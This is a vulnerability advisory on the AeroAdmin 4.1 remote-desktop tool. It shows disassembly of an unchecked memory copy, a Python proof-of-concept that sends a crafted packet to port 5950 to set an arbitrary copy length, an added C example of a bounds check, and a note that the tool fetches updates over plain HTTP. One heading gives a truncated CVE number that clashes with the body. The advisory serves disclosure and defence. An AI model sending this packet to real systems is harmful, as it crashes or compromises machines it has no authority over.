Tarlogic Advisory: Tarlogic-2017-001
Title: Multiple vulnerabilities found in AeroAdmin 4.1 software.
Discovered by: Juan Manuel Fernandez (@TheXC3LL)
CWE-ID: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
AeroAdmin Vulnerability – CVE-2017-889
AeroAdmin 4.1 uses a function to copy data between two pointers where the size of the data copied is taken directly from a network packet. This vulnerability has been reported as CVE-2017-8893.
005301B0 push edi
005301B1 push esi
005301B2 mov esi, ORIGEN
005301B6 mov ecx, SIZE
005301BA mov edi, DESTINO
005301BE mov eax, ecx
005301C0 mov edx, ecx
005301C2 add eax, esi
005301C4 cmp edi, esi
005301C6 jbe short loc_005
005301FE rep movsb ; Crash
00530200 mov eax, [esp+8+DESTINO]
00530204 pop esi
00530205 pop edi
We can control the "SIZE" variable, so the ECX register used by "rep movsb" holds an arbitrary value at this point. Set a breakpoint at the rep movsb address and test it:
# Proof of concept
import socket

target_IP = '192.168.245.206'  # Change as needed
target_port = 5950
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (target_IP, target_port)
sock.connect(server_address)
packet1 = bytes.fromhex("040000000037130000")  # <-- will be the value used as size (3713 --> 1337)
sock.sendall(packet1)
print("[+] Sent:\n " + packet1.hex())
ECX 00133700 <-- Number of bytes that are going to be copied
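To make the defect concrete, the following C program (an added example, not AeroAdmin's code) models the packet from the PoC above and contrasts the unchecked copy count the disassembly uses with a bounds-checked copy that rejects it. The header/length offsets, the destination capacity and the second "well-formed" packet are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed layout modelled on the PoC: 4 header bytes, a little-endian
 * 32-bit length, then payload. The offsets are an assumption for this
 * example, not taken from the AeroAdmin protocol. */
#define HDR_LEN 4u
#define PAYLOAD_OFF (HDR_LEN + 4u)
#define DST_CAP 64u

/* The PoC packet from the advisory: 040000000037130000 */
const uint8_t POC_PACKET[] = {0x04,0x00,0x00,0x00, 0x00,0x37,0x13,0x00, 0x00};
const size_t POC_PACKET_LEN = sizeof(POC_PACKET);
/* Constructed well-formed packet whose length field matches its payload */
const uint8_t GOOD_PACKET[] = {0x04,0x00,0x00,0x00, 0x05,0x00,0x00,0x00, 'h','e','l','l','o'};
const size_t GOOD_PACKET_LEN = sizeof(GOOD_PACKET);
uint8_t g_dst[DST_CAP];

static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Vulnerable pattern (what the disassembly does): the count handed to
 * rep movsb is read straight from the packet. Returned here instead of
 * copied so the mismatch is visible without crashing. */
uint32_t untrusted_copy_count(const uint8_t *pkt) {
    return read_le32(pkt + HDR_LEN);
}

/* Hardened version: the claimed length must fit both the bytes that really
 * arrived and the destination buffer. Returns bytes copied, or -1 if rejected. */
int checked_copy(uint8_t *dst, size_t dst_cap, const uint8_t *pkt, size_t pkt_len) {
    if (pkt_len < PAYLOAD_OFF) return -1;        /* too short to hold a length */
    uint32_t claimed = read_le32(pkt + HDR_LEN);
    size_t avail = pkt_len - PAYLOAD_OFF;        /* payload bytes actually present */
    if (claimed > avail || claimed > dst_cap) return -1;
    memcpy(dst, pkt + PAYLOAD_OFF, claimed);
    return (int)claimed;
}

int main(void) {
    printf("PoC claims %u bytes, only %zu present -> checked_copy = %d\n",
           untrusted_copy_count(POC_PACKET), POC_PACKET_LEN - PAYLOAD_OFF,
           checked_copy(g_dst, DST_CAP, POC_PACKET, POC_PACKET_LEN));
    printf("well-formed packet -> checked_copy = %d\n",
           checked_copy(g_dst, DST_CAP, GOOD_PACKET, GOOD_PACKET_LEN));
    return 0;
}
```

The claimed count for the PoC packet is 0x00133700, the same value seen in ECX at the breakpoint, while only one payload byte is present.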
Aeroadmin 4.1 CVE-2017-8894
AeroAdmin 4.1 uses an insecure protocol (HTTP) to perform software updates.
An attacker can hijack an update via man-in-the-middle in order to execute code on the machine.